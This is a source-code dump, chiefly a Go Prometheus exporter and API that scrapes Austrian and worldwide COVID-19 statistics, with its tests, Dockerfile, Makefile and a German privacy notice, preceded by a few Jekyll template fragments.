urn:uuid:{{ include.uuid }}@{{ hostname }}
<|start_filename|>_includes/key.html<|end_filename|>
{%- assign hostname = include.url | split: "://" | reverse | first | split: "/" | first | split: ':' | first -%}
gbif:occurrence:{{ include.key }}@{{ hostname }}
<|start_filename|>_includes/media_gbif.html<|end_filename|>
<div style="display: flex; flex-direction: column; border: solid; border-style: top;">
Media
<div style="display: flex; justify-content: space-evenly;">
<div>
{% assign original_online = include.media_gbif.identifier %}
{% include media_frag.html origin=original_online %}
</div>
</div>
<div id="{{ include.media_gbif | jsonify | uri_escape }}" class="meta"></div>
</div>
| jhpoelen/bats |
<|start_filename|>impressum.html<|end_filename|>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Impressum & Datenschutz</title>
<style>
body {
background: #161719;
font-family: "Courier New", Courier, monospace;
color: orange;
margin: 6em;
}
a {
color: chartreuse;
}
a:hover {
color: #00f2c3;
}
h1,h2,h3,h4 {
color: yellow;
}
</style>
</head>
<body>
<h1>Impressum</h1>
<h2><a href="https://covid19.spiessknafl.at">https://covid19.spiessknafl.at</a></h2>
<h2>Erklärung zur Informationspflicht / Datenschutzerklärung</h2>
<p>
Der Schutz Ihrer persönlichen Daten ist uns ein besonderes Anliegen. Wir verarbeiten Ihre Daten daher ausschließlich auf Grundlage der gesetzlichen Bestimmungen (DSGVO, TKG 2003) und nur im absolut notwendigen Rahmen.
</p>
<h4>Kontakt mit uns</h4>
<p>
Wenn Sie per E-Mail Kontakt mit uns aufnehmen, werden Ihre angegebenen Daten zwecks Bearbeitung der Anfrage und für den Fall von Anschlussfragen sechs Monate bei uns gespeichert. Diese Daten geben wir nicht ohne Ihre Einwilligung weiter.
</p>
<h4>Nutzungsaufzeichnung</h4>
<p>
Wir verwenden <strong>keinen</strong> externen Webanalysedienst und es werden <strong>keine</strong> Cookies auf Ihrem Rechner gespeichert. Wir behalten uns vor, anonymisierte Aufrufstatistiken zur Analyse der Webseitenperformance auf unseren Servern zu speichern (die Verarbeitung ergibt sich aus Art. 6 DSGVO). Auch diese werden nach maximal 6 Monaten gelöscht.
</p>
<h4>Ihre Rechte</h4>
<p>
Ihnen stehen bezüglich Ihrer bei uns gespeicherten Daten grundsätzlich die Rechte auf Auskunft, Berichtigung, Löschung, Einschränkung, Datenübertragbarkeit, Widerruf und Widerspruch zu. Wenn Sie glauben, dass die Verarbeitung Ihrer Daten gegen das Datenschutzrecht verstößt oder Ihre datenschutzrechtlichen Ansprüche sonst in einer Weise verletzt worden sind, können Sie sich bei der im Impressum angegebenen E-Mail-Adresse oder der Datenschutzbehörde beschweren.
</p>
<h3>Kontakt</h3>
<NAME><br>
<ul>
<li><a href="https://spiessknafl.at/peter/">https://spiessknafl.at/peter/</a></li>
<li><a href="https://covid19.spiessknafl.at">https://covid19.spiessknafl.at</a></li>
<li><a href="https://github.com/cinemast/covid19-at">https://github.com/cinemast/covid19-at</a> (Bug tracker und Source Code)</li>
</ul>
dev<!-- <EMAIL> -->@spi<!--
-->ess<!-- <div>O_o 📧</div> -->knaf<!---->l.<!-- // /*@mail@*/ -->a<!--
<EMAIL>.<EMAIL>
-->t<br>
</body>
</html>
<|start_filename|>healthministry.go<|end_filename|>
package main
import (
"encoding/json"
"fmt"
)
type healthMinistryExporter struct {
mp *metadataProvider
url string
}
type ministryStat []struct {
Label string
Y uint64
Z uint64
}
func newHealthMinistryExporter() *healthMinistryExporter {
return &healthMinistryExporter{mp: newMetadataProviderWithFilename("bezirke.csv"), url: "https://info.gesundheitsministerium.at/data"}
}
func checkTags(result metrics, field string) []error {
errors := make([]error, 0)
for _, s := range result {
if len(*s.Tags) != 4 {
errors = append(errors, fmt.Errorf("Missing tags for: %s", (*s.Tags)[field]))
}
}
return errors
}
func (h *healthMinistryExporter) GetMetrics() (metrics, error) {
metrics := make(metrics, 0)
result, _ := h.getSimpleData()
metrics = append(metrics, result...)
result, err := h.getAgeMetrics()
metrics = append(metrics, result...)
result, err = h.getGeschlechtsVerteilung()
metrics = append(metrics, result...)
result, err = h.getBundeslandInfections()
metrics = append(metrics, result...)
result, err = h.getBezirke()
metrics = append(metrics, result...)
result, err = h.getBundeslandHealedDeaths()
metrics = append(metrics, result...)
return metrics, err
}
func (h *healthMinistryExporter) Health() []error {
errors := make([]error, 0)
result, err := h.getBezirke()
if err != nil {
errors = append(errors, err)
}
if len(result) < 10 {
errors = append(errors, fmt.Errorf("Not enough Bezirke Results: %d", len(result)))
}
errors = append(errors, checkTags(result, "bezirk")...)
result, err = h.getBundeslandInfections()
if err != nil {
errors = append(errors, err)
}
if len(result) != 27 {
errors = append(errors, fmt.Errorf("Missing Bundesland result %d", len(result)))
}
errors = append(errors, checkTags(result, "province")...)
result, err = h.getAgeMetrics()
if err != nil {
errors = append(errors, err)
}
if len(result) < 4 {
errors = append(errors, fmt.Errorf("Missing age metrics"))
}
result, err = h.getGeschlechtsVerteilung()
if err != nil {
errors = append(errors, err)
}
if len(result) != 2 {
errors = append(errors, fmt.Errorf("Geschlechtsverteilung failed"))
}
result, err2 := h.getSimpleData()
errors = append(errors, err2...)
if len(result) < 3 {
errors = append(errors, fmt.Errorf("Could not find \"Bestätigte Fälle\""))
}
return errors
}
func (h *healthMinistryExporter) getTags(location string, fieldName string, data *metaData) *map[string]string {
if data != nil {
return &map[string]string{fieldName: location, "country": "Austria", "longitude": ftos(data.location.long), "latitude": ftos(data.location.lat)}
}
return &map[string]string{fieldName: location, "country": "Austria"}
}
func (h *healthMinistryExporter) getBezirke() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Bezirke.js")
if err != nil {
return nil, err
}
bezirkeStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &bezirkeStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range bezirkeStats {
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "bezirk", data)
result = append(result, metric{"cov19_bezirk_infected", tags, float64(s.Y)})
if data != nil {
result = append(result, metric{"cov19_bezirk_infected_100k", tags, float64(infection100k(s.Y, data.population))})
}
}
return result, nil
}
func (h *healthMinistryExporter) getBezirkStat() ([]bezirkStat, error) {
arrayString, err := readArrayFromGet(h.url + "/Bezirke.js")
if err != nil {
return nil, err
}
bezirkeStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &bezirkeStats)
if err != nil {
return nil, err
}
result := make([]bezirkStat, 0)
for _, s := range bezirkeStats {
data := h.mp.getMetadata(s.Label)
if data == nil {
// Skip districts without a metadata entry instead of dereferencing a nil pointer.
continue
}
result = append(result, bezirkStat{s.Label, apiLocaiton{Lat: data.location.lat, Long: data.location.long}, data.population, s.Y})
}
return result, nil
}
func mapBundeslandLabel(label string) string {
switch label {
case "Ktn":
return "Kärnten"
case "NÖ":
return "Niederösterreich"
case "OÖ":
return "Oberösterreich"
case "Sbg":
return "Salzburg"
case "Stmk":
return "Steiermark"
case "T":
return "Tirol"
case "V":
return "Vorarlberg"
case "W":
return "Wien"
case "Bgld":
return "Burgenland"
}
return "unknown"
}
func (h *healthMinistryExporter) getBundeslandInfections() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Bundesland.js")
if err != nil {
return nil, err
}
provinceStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &provinceStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range provinceStats {
s.Label = mapBundeslandLabel(s.Label)
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "province", data)
result = append(result, metric{"cov19_detail", tags, float64(s.Y)})
if data != nil {
result = append(result, metric{"cov19_detail_infected_per_100k", tags, float64(infection100k(s.Y, data.population))})
result = append(result, metric{"cov19_detail_infection_rate", tags, float64(infectionRate(s.Y, data.population))})
}
}
return result, nil
}
func (h *healthMinistryExporter) getBundeslandHealedDeaths() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/GenesenTodesFaelleBL.js")
if err != nil {
return nil, err
}
provinceStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &provinceStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range provinceStats {
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "province", data)
result = append(result, metric{"cov19_detail_healed", tags, float64(s.Y)})
result = append(result, metric{"cov19_detail_dead", tags, float64(s.Z)})
}
return result, nil
}
func (h *healthMinistryExporter) getAgeStat() (map[string]uint64, error) {
arrayString, err := readArrayFromGet(h.url + "/Altersverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(map[string]uint64)
for _, s := range ageStats {
result[s.Label] = s.Y
}
return result, nil
}
func (h *healthMinistryExporter) getAgeMetrics() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Altersverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range ageStats {
tags := &map[string]string{"country": "Austria", "group": s.Label}
result = append(result, metric{"cov19_age_distribution", tags, float64(s.Y)})
}
return result, nil
}
func (h *healthMinistryExporter) getGeschlechtsVerteilung() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Geschlechtsverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range ageStats {
tags := &map[string]string{"country": "Austria", "sex": s.Label}
result = append(result, metric{"cov19_sex_distribution", tags, float64(s.Y)})
}
return result, nil
}
func addVarIfValid(errors []error, result metrics, url string, varName string, metricName string) ([]error, metrics) {
value, err := readJsVarFromGet(url, varName)
if err != nil {
errors = append(errors, err)
} else {
result = append(result, metric{metricName, nil, atof(value)})
}
return errors, result
}
func (h *healthMinistryExporter) getSimpleData() (metrics, []error) {
errors := make([]error, 0)
result := make(metrics, 0)
errors, result = addVarIfValid(errors, result, h.url+"/SimpleData.js", "Erkrankungen", "cov19_confirmed")
errors, result = addVarIfValid(errors, result, h.url+"/Genesen.js", "dpGenesen", "cov19_healed")
errors, result = addVarIfValid(errors, result, h.url+"/VerstorbenGemeldet.js", "dpTotGemeldet", "cov19_dead")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlNormalbettenBel.js", "dpGesNBBel", "cov19_hospitalized")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlIntensivBettenBel.js", "dpGesIBBel", "cov19_intensive_care")
errors, result = addVarIfValid(errors, result, h.url+"/GesamtzahlTestungen.js", "dpGesTestungen", "cov19_tests")
return result, errors
}
<|start_filename|>helper.go<|end_filename|>
package main
import (
"errors"
"io/ioutil"
"net/http"
"regexp"
"strconv"
"strings"
"time"
)
func atoi(s string) uint64 {
s = strings.ReplaceAll(s, ".", "")
s = strings.ReplaceAll(s, ",", "")
result, err := strconv.ParseUint(s, 10, 64)
if err != nil {
return 0
}
return result
}
func atoif(s string) float64 {
return float64(atoi(s))
}
func atof(s string) float64 {
result, err := strconv.ParseFloat(s, 64)
if err != nil {
return 0
}
return result
}
func ftos(f float64) string {
return strconv.FormatFloat(f, 'f', 6, 64)
}
func fatalityRate(infections uint64, deaths uint64) float64 {
return float64(deaths) / float64(infections)
}
func infectionRate(infections uint64, population uint64) float64 {
return float64(infections) / float64(population)
}
func infection100k(infections uint64, population uint64) float64 {
return infectionRate(infections, population) * float64(100000)
}
func readArrayFromGet(url string) (string, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(url)
if err != nil {
return "", err
}
defer response.Body.Close()
json, err := ioutil.ReadAll(response.Body)
if err != nil {
return "", err
}
jsonString := string(json)
arrayBegin := strings.Index(jsonString, "[")
if arrayBegin == -1 {
return "", errors.New("Could not find beginning of array")
}
arrayEnd := strings.LastIndex(jsonString, "]")
if arrayEnd == -1 {
return "", errors.New("Could not find end of array")
}
return jsonString[arrayBegin : arrayEnd+1], nil
}
func readJsVarFromGet(url string, varName string) (string, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(url)
if err != nil {
return "", err
}
defer response.Body.Close()
lines, err := ioutil.ReadAll(response.Body)
if err != nil {
return "", err
}
match := regexp.MustCompile(varName + ` = "([0-9\.]+)"`).FindStringSubmatch(string(lines))
if len(match) != 2 {
return "", errors.New(varName + " not found in " + url[strings.LastIndex(url, "/"):])
}
return strings.Replace(match[1], ".", "", 1), nil
}
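// Illustrative example (hypothetical payload): if the fetched script contains
//   var dpGenesen = "1.234";
// then readJsVarFromGet(url, "dpGenesen") returns "1234"; the first thousands
// separator is stripped so the caller can hand the value straight to atof.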
<|start_filename|>main.go<|end_filename|>
package main
import (
"encoding/json"
"fmt"
"log"
"net/http"
"os"
)
var logger = log.New(os.Stdout, "covid19-at", 0)
var mp = newMetadataProvider()
var he = newHealthMinistryExporter()
var exporters = []Exporter{
he,
newEcdcExporter(mp),
newMathdroExporter(),
}
var a = newApi(he)
func writeJson(w http.ResponseWriter, f func() (interface{}, error)) {
result, err := f()
if err != nil {
w.WriteHeader(500)
w.Write([]byte(err.Error()))
} else {
bytes, err := json.Marshal(result)
if err != nil {
w.WriteHeader(500)
w.Write([]byte(err.Error()))
} else {
w.Header().Add("Content-type", "application/json; charset=utf-8")
w.Write(bytes)
}
}
}
func handleApiBundesland(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetBundeslandStat() })
}
func handleApiBezirk(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetBezirkStat() })
}
func handleApiTotal(w http.ResponseWriter, _ *http.Request) {
writeJson(w, func() (interface{}, error) { return a.GetOverallStat() })
}
func handleMetrics(w http.ResponseWriter, _ *http.Request) {
for _, e := range exporters {
metrics, err := e.GetMetrics()
if err == nil {
writeMetrics(metrics, w)
}
}
}
func handleHealth(w http.ResponseWriter, _ *http.Request) {
errors := make([]error, 0)
for _, e := range exporters {
errors = append(errors, e.Health()...)
}
if len(errors) > 0 {
w.WriteHeader(http.StatusInternalServerError)
errorResponse := ""
for _, e := range errors {
errorResponse += e.Error() + "\n"
}
fmt.Fprintf(w, `<html><body><img width="500" src="https://spiessknafl.at/fine.jpg"/><pre>%s</pre></body></html>`, errorResponse)
} else {
fmt.Fprintf(w, `<html><body><img width="500" src="https://spiessknafl.at/helth.png"/></body></html>`)
}
}
func main() {
http.HandleFunc("/metrics", handleMetrics)
http.HandleFunc("/health", handleHealth)
http.HandleFunc("/api/bundesland", handleApiBundesland)
http.HandleFunc("/api/bezirk", handleApiBezirk)
http.HandleFunc("/api/total", handleApiTotal)
err := http.ListenAndServe(":8282", nil)
if err != nil {
panic(err)
}
}
<|start_filename|>api.go<|end_filename|>
package main
type apiLocaiton struct {
Lat float64
Long float64
}
type bundeslandStat struct {
Name string
Location apiLocaiton
Population uint64
Infected uint64
Dead uint64
Hospitalized uint64
IntensiveCare uint64
Healed uint64
}
type bezirkStat struct {
Name string
Location apiLocaiton
Population uint64
Infected uint64
}
type overallStat struct {
TotalInfected uint64
TotalDead uint64
TotalHospitalized uint64
TotalIntensiveCare uint64
AgeDistributionInfection map[string]uint64
}
type api struct {
he *healthMinistryExporter
}
func newApi(he *healthMinistryExporter) *api {
return &api{he}
}
func (a *api) GetOverallStat() (overallStat, error) {
r := overallStat{}
ageStats, err := a.he.getAgeStat()
if err != nil {
return overallStat{}, err
}
r.AgeDistributionInfection = ageStats
bundeslandStats, err := a.GetBundeslandStat()
if err != nil {
return overallStat{}, err
}
d, err2 := a.he.getSimpleData()
if len(err2) != 0 {
return overallStat{}, err2[0]
}
sumInfect := uint64(0)
sumDead := uint64(0)
sumHospitalized := uint64(0)
sumIntensiveCare := uint64(0)
for _, v := range bundeslandStats {
sumInfect += v.Infected
sumDead += v.Dead
sumHospitalized += v.Hospitalized
sumIntensiveCare += v.IntensiveCare
}
r.TotalDead = sumDead
r.TotalInfected = sumInfect
r.TotalHospitalized = sumHospitalized
r.TotalIntensiveCare = sumIntensiveCare
confirmed := d.findMetric("cov19_confirmed", "")
if confirmed != nil {
r.TotalInfected = uint64(confirmed.Value)
}
return r, nil
}
func (a *api) GetBezirkStat() ([]bezirkStat, error) {
return a.he.getBezirkStat()
}
func (a *api) GetBundeslandStat() ([]bundeslandStat, error) {
result := make([]bundeslandStat, 0)
/*for k, v := range bundeslandStats {
data := a.se.mp.getMetadata(k)
hospitalized := uint64(0)
intensiveCare := uint64(0)
if v, ok := hospitalStat[k]; ok {
hospitalized = v.Hospitalized
intensiveCare = v.IntensiveCare
}
result = append(result, bundeslandStat{
Name: k,
Infected: v.infected,
Dead: v.deaths,
Population: data.population,
Hospitalized: hospitalized,
IntensiveCare: intensiveCare,
Location: apiLocaiton{Lat: data.location.lat, Long: data.location.long},
})
}*/
return result, nil
}
<|start_filename|>cmd/location/main.go<|end_filename|>
package main
import (
"encoding/csv"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strconv"
)
type mapsResponse struct {
Candidates []struct {
Geometry struct {
Location struct {
Lat float64
Lng float64
}
}
}
}
type mapLocation struct {
latitude float64
longitude float64
}
func getLocation(location string, key string) (*mapLocation, error) {
response, err := http.Get(fmt.Sprintf("https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=%s&inputtype=textquery&fields=geometry&key=%s", url.QueryEscape(location), key))
if err != nil {
return nil, err
}
defer response.Body.Close()
bytes, err := ioutil.ReadAll(response.Body)
if err != nil {
return nil, err
}
result := mapsResponse{}
err = json.Unmarshal(bytes, &result)
if err != nil {
return nil, err
}
if len(result.Candidates) == 0 {
return nil, errors.New("Not enough candidates for " + location)
}
return &mapLocation{latitude: result.Candidates[0].Geometry.Location.Lat, longitude: result.Candidates[0].Geometry.Location.Lng}, nil
}
func ftos(f float64) string {
return strconv.FormatFloat(f, 'f', 6, 64)
}
func main() {
args := os.Args[1:]
if len(args) < 1 {
panic("Commandline argument for google maps apikey required")
}
apiKey := args[0]
csvFile, _ := os.Open("bezirke.csv")
r := csv.NewReader(csvFile)
records, _ := r.ReadAll()
for _, r := range records {
location := r[0]
loc, err := getLocation(location, apiKey)
if err != nil {
fmt.Println(err.Error())
// Skip rows that could not be geocoded instead of dereferencing a nil location.
continue
}
fmt.Printf("%s,%s,%f,%f\n", location, r[1], loc.latitude, loc.longitude)
}
}
<|start_filename|>Dockerfile<|end_filename|>
FROM golang:latest as build
WORKDIR /go/src/app
COPY . .
RUN CGO_ENABLED=0 GOOS=linux go build -ldflags="-s -w" .
FROM alpine:latest
RUN apk --no-cache add ca-certificates
WORKDIR /root/
COPY --from=build /go/src/app/metadata.csv .
COPY --from=build /go/src/app/bezirke.csv .
COPY --from=build /go/src/app/covid19-at .
EXPOSE 8282
CMD ["./covid19-at"]
<|start_filename|>mathdro_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"testing"
)
var me = newMathdroExporter()
func TestRecovered(t *testing.T) {
result, err := me.GetMetrics()
assert.Nil(t, err)
assert.True(t, len(result) > 0, len(result))
}
<|start_filename|>api_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"net/http"
"net/http/httptest"
"testing"
)
func TestApiOverall(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiTotal))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
func TestApiBezirk(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiBezirk))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
func TestApiBundesland(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(handleApiBundesland))
defer ts.Close()
_, err := ts.Client().Get(ts.URL)
assert.Nil(t, err)
}
<|start_filename|>Makefile<|end_filename|>
.PHONY: test clean
default: build sync-logs
build:
go build -ldflags="-s -w" ./...
du -h covid19-at
image:
docker build -t covid19-at .
test:
GORACE="halt_on_error=1" go test -timeout 5s -race -v -coverprofile="coverage.txt" -covermode=atomic ./...
clean:
rm -f covid19-at coverage.txt data/report*
sync-logs:
mkdir -p data/nginx
rsync -avz covid19.spiessknafl.at:/var/log/nginx/ data/nginx/
report-exporter: sync-logs
gzcat -f data/nginx/* | grep "GET /covid19/metrics\|GET /covid19/api" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-exporter.html --ignore-crawlers
open data/report-exporter.html
report-prometheus: sync-logs
gzcat -f data/nginx/* | grep "/prometheus/api/v1/query\|/api/datasources/proxy/" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-prometheus.html --ignore-crawlers
open data/report-prometheus.html
report-grafana: sync-logs
gzcat -f data/nginx/* | grep "GET /d/\|/impressum.html" | grep -v "/public/\|favicon.ico\|/images/" | LANG="en_US.UTF-8" goaccess --log-format=COMBINED -q -a -o data/report-grafana.html --ignore-crawlers
open data/report-grafana.html
reports: report-exporter report-grafana report-prometheus
deploy:
ssh covid19.spiessknafl.at "cd covid19-at && git pull && docker-compose build && docker-compose up --force-recreate -d"
<|start_filename|>ecdc.go<|end_filename|>
package main
import (
"errors"
"fmt"
"net/http"
"strings"
"time"
"unicode"
"github.com/PuerkitoBio/goquery"
)
type ecdcExporter struct {
Url string
Mp *metadataProvider
}
type ecdcStat struct {
CovidStat
continent string
}
func newEcdcExporter(lp *metadataProvider) *ecdcExporter {
return &ecdcExporter{Url: "https://www.ecdc.europa.eu/en/geographical-distribution-2019-ncov-cases", Mp: lp}
}
//GetMetrics parses the ECDC table
func (e *ecdcExporter) GetMetrics() (metrics, error) {
stats, err := getEcdcStat(e.Url)
if err != nil {
return nil, err
}
result := make([]metric, 0)
for i := range stats {
tags := e.getTags(stats, i)
deaths := stats[i].deaths
infected := stats[i].infected
population := e.Mp.getPopulation(stats[i].location)
if deaths > 0 {
result = append(result, metric{Name: "cov19_world_death", Value: float64(deaths), Tags: &tags})
if population > 0 {
result = append(result, metric{Name: "cov19_world_fatality_rate", Value: fatalityRate(infected, deaths), Tags: &tags})
}
}
result = append(result, metric{Name: "cov19_world_infected", Value: float64(infected), Tags: &tags})
if population > 0 {
result = append(result, metric{Name: "cov19_world_infection_rate", Value: infectionRate(infected, population), Tags: &tags})
result = append(result, metric{Name: "cov19_world_infected_per_100k", Value: infection100k(infected, population), Tags: &tags})
}
}
return result, nil
}
//Health checks the functionality of the exporter
func (e *ecdcExporter) Health() []error {
errors := make([]error, 0)
worldStats, _ := e.GetMetrics()
if len(worldStats) < 200 {
errors = append(errors, fmt.Errorf("World stats are failing"))
}
for _, m := range worldStats {
country := (*m.Tags)["country"]
if e.Mp.getLocation(country) == nil {
errors = append(errors, fmt.Errorf("Could not find location for country: %s", country))
}
}
return errors
}
func normalizeCountryName(name string) string {
name = strings.TrimSpace(name)
parts := strings.FieldsFunc(name, func(r rune) bool { return r == ' ' || r == '_' })
for i, part := range parts {
if strings.ToUpper(part) == "AND" || strings.ToUpper(part) == "OF" {
parts[i] = strings.ToLower(part)
} else {
runes := []rune(part)
parts[i] = string(unicode.ToUpper(runes[0])) + strings.ToLower(string(runes[1:]))
}
}
return strings.Join(parts, " ")
}
func (e *ecdcExporter) getTags(stats []ecdcStat, i int) map[string]string {
var tags map[string]string
if e.Mp != nil && e.Mp.getLocation(stats[i].location) != nil {
location := e.Mp.getLocation(stats[i].location)
tags = map[string]string{"country": stats[i].location, "continent": stats[i].continent, "latitude": ftos(location.lat), "longitude": ftos(location.long)}
} else {
tags = map[string]string{"country": stats[i].location, "continent": stats[i].continent}
}
return tags
}
func getEcdcStat(url string) ([]ecdcStat, error) {
client := http.Client{Timeout: 3 * time.Second}
response, err := client.Get(url)
if err != nil {
return nil, err
}
defer response.Body.Close()
document, _ := goquery.NewDocumentFromReader(response.Body)
rows := document.Find("table").Find("tbody").Find("tr")
if rows.Size() == 0 {
return nil, errors.New("Could not find table")
}
result := make([]ecdcStat, 0)
rows.Each(func(i int, s *goquery.Selection) {
if i < rows.Size()-1 {
rowStart := s.Find("td").First()
location := normalizeCountryName(rowStart.Next().Text())
infections := atoi(rowStart.Next().Next().Text())
deaths := atoi(rowStart.Next().Next().Next().Text())
if (infections > 0 || deaths > 0) && location != "Other" {
result = append(result, ecdcStat{
CovidStat{
location: location,
infected: infections,
deaths: deaths,
},
rowStart.Text(),
})
}
}
})
return result, nil
}
<|start_filename|>metadata.go<|end_filename|>
package main
import (
"encoding/csv"
"log"
"os"
"regexp"
"strings"
)
type metadataProvider struct {
data map[string]metaData
}
type location struct {
lat float64
long float64
}
type metaData struct {
location location
country string
population uint64
}
func normalizeName(name string) string {
space := regexp.MustCompile(`[^A-Za-z]+`)
result := strings.ToUpper(space.ReplaceAllString(name, ""))
return result
}
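// Illustrative example: normalizeName("Niederösterreich") yields "NIEDERSTERREICH";
// characters outside A-Za-z (including umlauts) are stripped before uppercasing,
// so the same helper must be applied to both the CSV keys and the lookup strings,
// which newMetadataProviderWithFilename and the getters below already do.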
func newMetadataProvider() *metadataProvider {
return newMetadataProviderWithFilename("metadata.csv")
}
func newMetadataProviderWithFilename(filename string) *metadataProvider {
csvFile, err := os.Open(filename)
if err != nil {
log.Print(err)
return nil
}
defer csvFile.Close()
r := csv.NewReader(csvFile)
records, err := r.ReadAll()
if err != nil {
log.Print(err)
return nil
}
data := make(map[string]metaData, len(records))
for _, row := range records {
data[normalizeName(row[0])] = metaData{location{atof(row[2]), atof(row[3])}, row[0], atoi(row[1])}
}
return &metadataProvider{data: data}
}
func (l *metadataProvider) getMetadata(location string) *metaData {
if l, ok := l.data[normalizeName(location)]; ok {
return &l
}
return nil
}
//getLocation returns lat/long for a location name
func (l *metadataProvider) getLocation(location string) *location {
if l, ok := l.data[normalizeName(location)]; ok {
return &l.location
}
return nil
}
//getPopulation for a given location by name
func (l *metadataProvider) getPopulation(location string) uint64 {
if l, ok := l.data[normalizeName(location)]; ok {
return l.population
}
return 0
}
<|start_filename|>mathdro.go<|end_filename|>
package main
import (
"encoding/json"
"io/ioutil"
"net/http"
"time"
)
type mathdroExporter struct {
url string
}
type recoveredStats []struct {
ProvinceState *string
CountryRegion string
Recovered uint64
Lat float64
Long float64
}
func newMathdroExporter() *mathdroExporter {
return &mathdroExporter{url: "https://covid19.mathdro.id/api/"}
}
func (me *mathdroExporter) GetMetrics() (metrics, error) {
recovered, err := me.getRecoveredStats()
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, r := range recovered {
tags := map[string]string{"country": r.CountryRegion, "latitude": ftos(r.Lat), "longitude": ftos(r.Long)}
if r.ProvinceState != nil {
tags["province"] = *r.ProvinceState
}
result = append(result, metric{Name: "cov19_world_recovered", Tags: &tags, Value: float64(r.Recovered)})
}
return result, nil
}
func (me *mathdroExporter) Health() []error {
_, err := me.GetMetrics()
if err != nil {
return []error{err}
}
return nil
}
func (me *mathdroExporter) getRecoveredStats() (recoveredStats, error) {
client := http.Client{Timeout: 5 * time.Second}
response, err := client.Get(me.url + "recovered")
if err != nil {
return nil, err
}
defer response.Body.Close()
jsonString, err := ioutil.ReadAll(response.Body)
if err != nil {
return nil, err
}
recoveredStats := make(recoveredStats, 0)
err = json.Unmarshal(jsonString, &recoveredStats)
if err != nil {
return nil, err
}
return recoveredStats, nil
}
<|start_filename|>healthministry_test.go<|end_filename|>
package main
import (
"github.com/stretchr/testify/assert"
"testing"
)
var e = newHealthMinistryExporter()
func TestBezirke(t *testing.T) {
result, err := e.getBezirke()
assert.Nil(t, err)
assert.True(t, len(result) > 10, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
}
func TestBundesland(t *testing.T) {
result, err := e.getBundeslandInfections()
assert.Nil(t, err)
assert.True(t, len(result) == 3*9, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
vienna := result.findMetric("cov19_detail", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
assert.NotNil(t, result.findMetric("cov19_detail_infection_rate", "province=Salzburg"))
infectionRate := result.findMetric("cov19_detail_infection_rate", "province=Wien")
assert.NotNil(t, infectionRate)
assert.True(t, infectionRate.Value > 0 && infectionRate.Value < 1, infectionRate.Value)
infected100k := result.findMetric("cov19_detail_infected_per_100k", "province=Wien")
assert.NotNil(t, infected100k)
assert.True(t, infected100k.Value > 5 && infected100k.Value < 100, infected100k.Value)
}
func TestBundeslandHealedDeaths(t *testing.T) {
result, err := e.getBundeslandHealedDeaths()
assert.Nil(t, err)
assert.True(t, len(result) == 2*9, len(result))
for _, s := range result {
assert.Equal(t, 4, len(*s.Tags), s.Tags)
}
vienna := result.findMetric("cov19_detail_dead", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
vienna = result.findMetric("cov19_detail_healed", "province=Wien")
assert.NotNil(t, vienna)
assert.Equal(t, (*vienna.Tags)["country"], "Austria")
assert.Equal(t, (*vienna.Tags)["latitude"], "48.206351")
assert.Equal(t, (*vienna.Tags)["longitude"], "16.374817")
assert.NotNil(t, result.findMetric("cov19_detail_dead", "province=Salzburg"))
assert.NotNil(t, result.findMetric("cov19_detail_healed", "province=Salzburg"))
}
func TestAltersverteilung(t *testing.T) {
result, err := e.getAgeMetrics()
assert.Nil(t, err)
assert.True(t, len(result) >= 4, len(result))
for _, s := range result {
assert.Equal(t, 2, len(*s.Tags), s.Tags)
}
}
